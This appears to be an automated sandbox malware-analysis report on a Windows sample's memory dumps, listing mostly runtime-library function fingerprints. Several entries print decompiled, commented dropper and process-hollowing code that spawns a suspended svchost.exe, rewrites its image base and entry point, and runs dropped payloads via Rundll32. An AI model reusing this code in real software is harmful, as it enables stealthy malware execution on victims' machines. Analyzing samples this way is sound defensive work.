• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 38dc9f35f037bf23748df1cb8b205481120ccb54b692fbe185308617138d8559
• Instruction ID: 8c137353dac94774b337ee3e78edc5e6b0210c9da48b7374457c09a75ba28c3e
• Opcode Fuzzy Hash: 38dc9f35f037bf23748df1cb8b205481120ccb54b692fbe185308617138d8559
• Instruction Fuzzy Hash: C4219A7694010CAFDB41EF94C882DDE7BBAFF08355F004169F915AB121EB31EA49DB84
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: __aulldvrm
• String ID: :$f$f$f$p$p$p
• API String ID: 1302938615-1434680307
• Opcode ID: 66a0a20a5a53b751cbe040998e974d70f42e7be17b856497f3965f381c9d3c61
• Instruction ID: 65f7bdcf5c3ec2fc227825e4d8bcaacd581bb17d49d51d194163537b8d613334
• Opcode Fuzzy Hash: 66a0a20a5a53b751cbe040998e974d70f42e7be17b856497f3965f381c9d3c61
• Instruction Fuzzy Hash: 2F02AE75E00219EADF20CFA5D4846EDBBB3FF05B14F6446BAD419BB280D7349E888B15
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: _free_strpbrk
• String ID: *?
• API String ID: 3300345361-2564092906
• Opcode ID: 3b7bce0c6228894d87f02c0b90c55eb72cdad3bfbb192536ea74d8b888809b18
• Instruction ID: c54a39845aba82b75ac316383b9f5b123cda1350f9d6361d2ebec8c7015a14a0
• Opcode Fuzzy Hash: 3b7bce0c6228894d87f02c0b90c55eb72cdad3bfbb192536ea74d8b888809b18
• Instruction Fuzzy Hash: 2CE12AB5E042199FCB14DFA8D8819EEFBF6EF48310F14816EE815E7340E671AE458B94
Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cd30116a94c7567bd0c12736c04a692bff9d948ad034444e283d86cfecb2015e
                                                                                                                                                    • Instruction ID: ee6760f74ce00fa1b3386546e18c60152b58996d2557a042c3afb7cfd0aa2dca
                                                                                                                                                    • Opcode Fuzzy Hash: cd30116a94c7567bd0c12736c04a692bff9d948ad034444e283d86cfecb2015e
                                                                                                                                                    • Instruction Fuzzy Hash: 8CC1C1B4A08249AFDF21DF99E881BAD7FB3AF49300F144159F844A7392D7319D42CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                    • Opcode ID: 0bb294ae55dfec913af7a3bbf4168abe62a65dee3546c804af3ebf42fa8838f1
                                                                                                                                                    • Instruction ID: 7e93337ca2297d38ad0b0cbeced52b7670720e331bcef6fc8cc0c86f7cb8585c
                                                                                                                                                    • Opcode Fuzzy Hash: 0bb294ae55dfec913af7a3bbf4168abe62a65dee3546c804af3ebf42fa8838f1
                                                                                                                                                    • Instruction Fuzzy Hash: 5461E4729003059FDB20DFA8C841BAAB7EAAF45311F24465DFD55EB281EB30AD49CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 0064DCDA
                                                                                                                                                    • _free.LIBCMT ref: 0064DD4E
                                                                                                                                                    • _free.LIBCMT ref: 0064DD67
                                                                                                                                                    • _free.LIBCMT ref: 0064DDA5
                                                                                                                                                    • _free.LIBCMT ref: 0064DDAE
                                                                                                                                                    • _free.LIBCMT ref: 0064DDBA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                    • String ID: C
                                                                                                                                                    • API String ID: 4275183328-1037565863
                                                                                                                                                    • Opcode ID: 78900c554daf2b544f11a3b40633fb287f2dfbe47a7054d51b20e3cbd46248ee
                                                                                                                                                    • Instruction ID: 672769a1119b9fb1a231881337941da94ac54b0dc3e173916b5ba522bd1bc7c0
                                                                                                                                                    • Opcode Fuzzy Hash: 78900c554daf2b544f11a3b40633fb287f2dfbe47a7054d51b20e3cbd46248ee
                                                                                                                                                    • Instruction Fuzzy Hash: B6C12975E016199BDB24DF28C884AADB7B6FF49304F1045EEE909A7390D771AE90CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • UnDecorator::getArgumentList.LIBVCRUNTIME ref: 00632389
                                                                                                                                                      • Part of subcall function 00632273: Replicator::operator[].LIBVCRUNTIME ref: 006322DF
                                                                                                                                                      • Part of subcall function 00632273: DName::operator+=.LIBVCRUNTIME ref: 006322E7
                                                                                                                                                    • DName::operator+.LIBCMT ref: 006323E0
                                                                                                                                                    • DName::DName.LIBVCRUNTIME ref: 00632429
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>
                                                                                                                                                    • API String ID: 834187326-463753507
                                                                                                                                                    • Opcode ID: 272eff9c7a004a4f3e2b96ce28670843c6a5218ea62318fd686e86d4e7515959
                                                                                                                                                    • Instruction ID: df9c56bc67a405be2362147f3529e7121c99b458773ada135eb570d356f76f29
                                                                                                                                                    • Opcode Fuzzy Hash: 272eff9c7a004a4f3e2b96ce28670843c6a5218ea62318fd686e86d4e7515959
                                                                                                                                                    • Instruction Fuzzy Hash: 60218E7060420A9FDB14DF5CD861BAA3FE6EB0A358F006169E445DB363C738E945CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0065ACDC: _free.LIBCMT ref: 0065AD01
                                                                                                                                                    • _free.LIBCMT ref: 0065B03F
                                                                                                                                                      • Part of subcall function 00650CDF: HeapFree.KERNEL32(00000000,00000000,?,0064E5D9), ref: 00650CF5
                                                                                                                                                      • Part of subcall function 00650CDF: GetLastError.KERNEL32(?,?,0064E5D9), ref: 00650D07
                                                                                                                                                    • _free.LIBCMT ref: 0065B04A
                                                                                                                                                    • _free.LIBCMT ref: 0065B055
                                                                                                                                                    • _free.LIBCMT ref: 0065B0A9
                                                                                                                                                    • _free.LIBCMT ref: 0065B0B4
                                                                                                                                                    • _free.LIBCMT ref: 0065B0BF
                                                                                                                                                    • _free.LIBCMT ref: 0065B0CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 9791cb4a201bd81e0f8ea3ec39f59c9674df00ecdb44f6a8a8e1fa3abcf23121
                                                                                                                                                    • Instruction ID: 17ade88cc9cd133b6a7ff90e983bffebcea2e9358da912cea01b4e6702d3c22b
                                                                                                                                                    • Opcode Fuzzy Hash: 9791cb4a201bd81e0f8ea3ec39f59c9674df00ecdb44f6a8a8e1fa3abcf23121
                                                                                                                                                    • Instruction Fuzzy Hash: FB118132584B84AFE7A0B7B0CC07FCB779E6F01702F404A1CBA9966092DA74F90D9695
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • UnDecorator::UScore.LIBVCRUNTIME ref: 006325EC
                                                                                                                                                    • DName::DName.LIBVCRUNTIME ref: 006325F6
                                                                                                                                                      • Part of subcall function 00630CE9: DName::doPchar.LIBVCRUNTIME ref: 00630D10
                                                                                                                                                    • UnDecorator::getScopedName.LIBVCRUNTIME ref: 00632635
                                                                                                                                                    • DName::operator+=.LIBVCRUNTIME ref: 0063263F
                                                                                                                                                    • DName::operator+=.LIBCMT ref: 0063264E
                                                                                                                                                    • DName::operator+=.LIBCMT ref: 0063265A
                                                                                                                                                    • DName::operator+=.LIBCMT ref: 00632667
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1480779885-0
                                                                                                                                                    • Opcode ID: 1a69dd49d508d6f05d1eed14f254328ab10ab7d0064830183d5eabb4c3edf9d9
                                                                                                                                                    • Instruction ID: 6cf22091545dc8fae2160b296331ede1725c39bc8d1297ec3fa7fa63a64ea329
                                                                                                                                                    • Opcode Fuzzy Hash: 1a69dd49d508d6f05d1eed14f254328ab10ab7d0064830183d5eabb4c3edf9d9
                                                                                                                                                    • Instruction Fuzzy Hash: 0811A130400204AFDB08EF64C967AEE7BA6EF12300F04419DE4029B2E3CB70AA46CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00612C20(void** _a4, intOrPtr* _a8) {
                                                                                                                                                    				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                    				struct _STARTUPINFOA _v88;
                                                                                                                                                    				char _v348;
                                                                                                                                                    
                                                                                                                                                    				E006114A0( &_v88, 0, 0x44);
                                                                                                                                                    				_v88.cb = 0x44;
                                                                                                                                                    				GetEnvironmentVariableA("SystemRoot",  &_v348, 0x104);
                                                                                                                                                    				lstrcatA( &_v348, "\\System32\\svchost.exe");
                                                                                                                                                    				if(CreateProcessA(0,  &_v348, 0, 0, 0, 0x424, 0, 0,  &_v88,  &_v20) != 0) {
                                                                                                                                                    					 *_a4 = _v20.hProcess;
                                                                                                                                                    					 *_a8 = _v20.hThread;
                                                                                                                                                    					return 1;
                                                                                                                                                    				}
                                                                                                                                                    				return 0;
                                                                                                                                                    			}


                                                                                                                                                    APIs
                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 00612C51
                                                                                                                                                    • lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 00612C63
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 00612C89
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateEnvironmentProcessVariablelstrcat
                                                                                                                                                    • String ID: D$SystemRoot$\System32\svchost.exe
                                                                                                                                                    • API String ID: 3510847443-1175289849
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 006647D1
• __fassign.LIBCMT ref: 006649B0
• __fassign.LIBCMT ref: 006649CD
• WriteFile.KERNEL32(?,0065CB6B,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00664A15
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00664A55
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00664B01
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: FileWrite__fassign$ConsoleErrorLast
• String ID:
• API String ID: 4031098158-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 0064BAF6
• _free.LIBCMT ref: 0064BB11
• _free.LIBCMT ref: 0064BB1C
• _free.LIBCMT ref: 0064BC29
  • Part of subcall function 00650D67: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00650DA8
• _free.LIBCMT ref: 0064BBFE
  • Part of subcall function 00650CDF: HeapFree.KERNEL32(00000000,00000000,?,0064E5D9), ref: 00650CF5
  • Part of subcall function 00650CDF: GetLastError.KERNEL32(?,?,0064E5D9), ref: 00650D07
• _free.LIBCMT ref: 0064BC1F
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: _free$Heap$AllocateErrorFreeLast
• String ID:
• API String ID: 4150789928-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,0062F535,0062BF5F), ref: 0062F54C
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0062F55A
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0062F573
• SetLastError.KERNEL32(00000000,?,0062F535,0062BF5F), ref: 0062F5C5
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: Mpunct$GetvalsH_prolog3_catch
• String ID: $+xv
• API String ID: 921663424-1686923651
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: _free$AllocateHeap
• String ID:
• API String ID: 3033488037-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 0064E466
• _free.LIBCMT ref: 0064E486
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0064E4E7
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0064E4F9
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0064E506
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: __crt_fast_encode_pointer$_free
• String ID:
• API String ID: 366466260-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 00665D84
• GetLastError.KERNEL32(?,?,?), ref: 00665D8E
• __dosmaperr.LIBCMT ref: 00665D95
• SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 00665DB3
• SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00665DD9
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: FilePointer$ErrorLast__dosmaperr
• String ID:
• API String ID: 1114809156-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 0065AA43
  • Part of subcall function 00650CDF: HeapFree.KERNEL32(00000000,00000000,?,0064E5D9), ref: 00650CF5
  • Part of subcall function 00650CDF: GetLastError.KERNEL32(?,?,0064E5D9), ref: 00650D07
• _free.LIBCMT ref: 0065AA55
• _free.LIBCMT ref: 0065AA67
• _free.LIBCMT ref: 0065AA79
• _free.LIBCMT ref: 0065AA8B
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID:
• String ID: C:\Users\Public\snd32sys.exe
• API String ID: 0-2460037051
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 86%
			E00613B10(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v264;   // generated temp file name (MAX_PATH buffer)
				char _v524;   // %TEMP% directory path
				char _v784;   // command line passed to CreateProcessA

				// Build a unique file name in the temp directory with prefix "BN"
				GetTempPathA(0x104,  &_v524);
				GetTempFileNameA( &_v524, "BN", 0,  &_v264);
				// E00613AA0 writes the payload buffer (_a4, length _a8) to the temp file;
				// its subcalls are CreateFileA (GENERIC_WRITE, CREATE_ALWAYS), WriteFile, CloseHandle
				if(E00613AA0(_a4,  &_v264, _a4, _a8) != 1) {
					return 0;
				}
				_push(_a8);
				// E006133A0 is not shown on this page; from the two branches below it
				// presumably decides whether the payload is a DLL
				if(E006133A0(_a4) != 1) {
					// not a DLL: execute the dropped file directly (E006136A0 wraps CreateProcessA)
					return E006136A0( &_v264);
				}
				// DLL payload: load it through "Rundll32.exe <tempfile>, start"
				wsprintfA( &_v784, "Rundll32.exe %s, start",  &_v264);
				return E006136A0( &_v784);
			}


APIs
• GetTempPathA.KERNEL32(00000104,?), ref: 00613B25
• GetTempFileNameA.KERNEL32(?,006142C0,00000000,?), ref: 00613B40
  • Part of subcall function 00613AA0: CreateFileA.KERNEL32(00611691,40000000,00000000,00000000,00000002,00000080,00000000,00611691), ref: 00613AC6
  • Part of subcall function 00613AA0: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00613AE7
  • Part of subcall function 00613AA0: CloseHandle.KERNEL32(000000FF), ref: 00613AF1
• wsprintfA.USER32 ref: 00613B8A
  • Part of subcall function 006136A0: CreateProcessA.KERNEL32(00000000,00613BB2,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 006136D7
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Similarity
• API ID: File$CreateTemp$CloseHandleNamePathProcessWritewsprintf
• String ID: Rundll32.exe %s, start
• API String ID: 130250823-2967502992
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: _strcspn$H_prolog3_ctype
• String ID:
• API String ID: 838279627-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.487458396.00000000006B1000.00000040.00020000.sdmp, Offset: 006B1000, based on PE: false
Similarity
• API ID: __common_dcos_data
• String ID:
• API String ID: 1949606188-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 006479A0: _free.LIBCMT ref: 006479AE
  • Part of subcall function 00656894: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,006566C4,?,00000000,00000000), ref: 00656936
• GetLastError.KERNEL32 ref: 00657B37
• __dosmaperr.LIBCMT ref: 00657B3E
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00657B7D
• __dosmaperr.LIBCMT ref: 00657B84
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
• String ID:
• API String ID: 167067550-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
• _free.LIBCMT ref: 00650ADD
• _free.LIBCMT ref: 00650B13
• SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,?,00637453,00650D05,?,?,0064E5D9), ref: 00650BD7
• _free.LIBCMT ref: 00650C34
• _free.LIBCMT ref: 00650C6A
• SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,00637453,00650D05,?,?,0064E5D9), ref: 00650C75
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                     			// Orchestrates the hand-off into a suspended child. Returns the child's PID,
                                                                                                                                                     			// 0xffffffff if the child was created but the injection failed (the child is
                                                                                                                                                     			// then terminated), and 0 if the pre-check E00612B20 fails.
                                                                                                                                                     			E00612B60(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                     				void* _v8;     // process handle of the suspended child (from E00612C20)
                                                                                                                                                     				long _v12;     // result: child PID, or 0xffffffff on failure
                                                                                                                                                     				void* _v16;    // primary thread handle of the child
                                                                                                                                                     				char _v20;     // out of E00613250: entry point passed to E006137C0 as the new EAX
                                                                                                                                                     				char _v24;     // out of E00613250: image base written into the child's PEB
                                                                                                                                                     
                                                                                                                                                     				_v12 = 0xffffffff;
                                                                                                                                                     				if(E00612B20(__ecx, _a4) != 0) {
                                                                                                                                                     					// E00612C20 creates the child and hands back its process and thread handles.
                                                                                                                                                     					if(E00612C20( &_v8,  &_v16) != 0) {
                                                                                                                                                     						// E00613250 (not shown in this section) appears to place the payload
                                                                                                                                                     						// (_a4, _a8) into the child and report where it landed (_v24) and its
                                                                                                                                                     						// entry point (_v20); E006137C0 then patches the PEB and thread context
                                                                                                                                                     						// and resumes the thread.
                                                                                                                                                     						if(E00613250(_v8, _a4, _a8,  &_v24,  &_v20) == 1 && E006137C0(_v8, _v16, _v24, _v20) == 1) {
                                                                                                                                                     							_v12 = GetProcessId(_v8);
                                                                                                                                                     						}
                                                                                                                                                     						// Any failure after creation: kill the half-built child rather than
                                                                                                                                                     						// leave a suspended process behind.
                                                                                                                                                     						if(_v12 == 0xffffffff) {
                                                                                                                                                     							TerminateProcess(_v8, 0);
                                                                                                                                                     						}
                                                                                                                                                     						CloseHandle(_v16);
                                                                                                                                                     						CloseHandle(_v8);
                                                                                                                                                     						return _v12;
                                                                                                                                                     					}
                                                                                                                                                     					return _v12;
                                                                                                                                                     				}
                                                                                                                                                     				return 0;
                                                                                                                                                     			}

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                     • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
                                                                                                                                                     • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
                                                                                                                                                     • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
                                                                                                                                                     • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 08cdd0f1b37b9629246d39be3f9fc53661f83ed476137782ca4e69b4613ee695
                                                                                                                                                    • Instruction ID: c05cb5aaffb189fc64a5be5ae4b53ee8581c82869b8dd8923b30cf06fc475c7f
                                                                                                                                                    • Opcode Fuzzy Hash: 08cdd0f1b37b9629246d39be3f9fc53661f83ed476137782ca4e69b4613ee695
                                                                                                                                                    • Instruction Fuzzy Hash: 29213EBAD0420ABBCB00DFE4DD959EE777AAB58315F148648FA15D3240E630EB909B60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                     			// Final step of the hollowing. _a4 = child process handle, _a8 = its suspended
                                                                                                                                                     			// primary thread, _a12 = new image base (decompiler typed it as void; it is a
                                                                                                                                                     			// 4-byte value), _a16 = new entry point.
                                                                                                                                                     			E006137C0(void* _a4, void* _a8, void _a12, intOrPtr _a16) {
                                                                                                                                                     				struct _CONTEXT _v720;
                                                                                                                                                     
                                                                                                                                                     				// 0x10002 = CONTEXT_i386 | CONTEXT_INTEGER: only the integer registers
                                                                                                                                                     				// (EAX, EBX, ...) are fetched and later written back, so EIP is left alone.
                                                                                                                                                     				_v720.ContextFlags = 0x10002;
                                                                                                                                                     				// Zero the 0x2c8 bytes after ContextFlags (an x86 CONTEXT is 0x2cc bytes).
                                                                                                                                                     				E006114A0( &(_v720.Dr0), 0, 0x2c8);
                                                                                                                                                     				if(GetThreadContext(_a8,  &_v720) != 0) {
                                                                                                                                                     					// On x86 a freshly created, still-suspended thread holds the PEB in EBX
                                                                                                                                                     					// and the image entry point in EAX. PEB+8 is ImageBaseAddress: overwrite
                                                                                                                                                     					// it with the base of the injected image.
                                                                                                                                                     					if(WriteProcessMemory(_a4, _v720.Ebx + 8,  &_a12, 4, 0) != 0) {
                                                                                                                                                     						// Redirect the entry point; the thread start stub calls what is in EAX.
                                                                                                                                                     						_v720.Eax = _a16;
                                                                                                                                                     						if(SetThreadContext(_a8,  &_v720) != 0) {
                                                                                                                                                     							ResumeThread(_a8);
                                                                                                                                                     							return 1;
                                                                                                                                                     						}
                                                                                                                                                     						return 0;
                                                                                                                                                     					}
                                                                                                                                                     					return 0;
                                                                                                                                                     				}
                                                                                                                                                     				return 0;
                                                                                                                                                     			}

                                                                                                                                                    APIs
                                                                                                                                                    • GetThreadContext.KERNEL32(00611EAF,00010002), ref: 006137F4
                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00500000,00000004,00000000), ref: 00613818
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                     • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
                                                                                                                                                     • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
                                                                                                                                                     • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
                                                                                                                                                     • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContextMemoryProcessThreadWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2099319263-0
                                                                                                                                                    • Opcode ID: 1b487940bde5e85e8aac3f4b08e1b81f2eeaf3393c51e60293956319396f13e7
                                                                                                                                                    • Instruction ID: 595f4250ee718cde756c7293a2b23a3b71c1ef95c440b0b5f3e585b820894992
                                                                                                                                                    • Opcode Fuzzy Hash: 1b487940bde5e85e8aac3f4b08e1b81f2eeaf3393c51e60293956319396f13e7
                                                                                                                                                    • Instruction Fuzzy Hash: 34116175605119ABDB50DF61EC49FEE37A9AF08705F14C558FA0ED7240EA70DA80CB60
                                                                                                                                                    Uniqueness

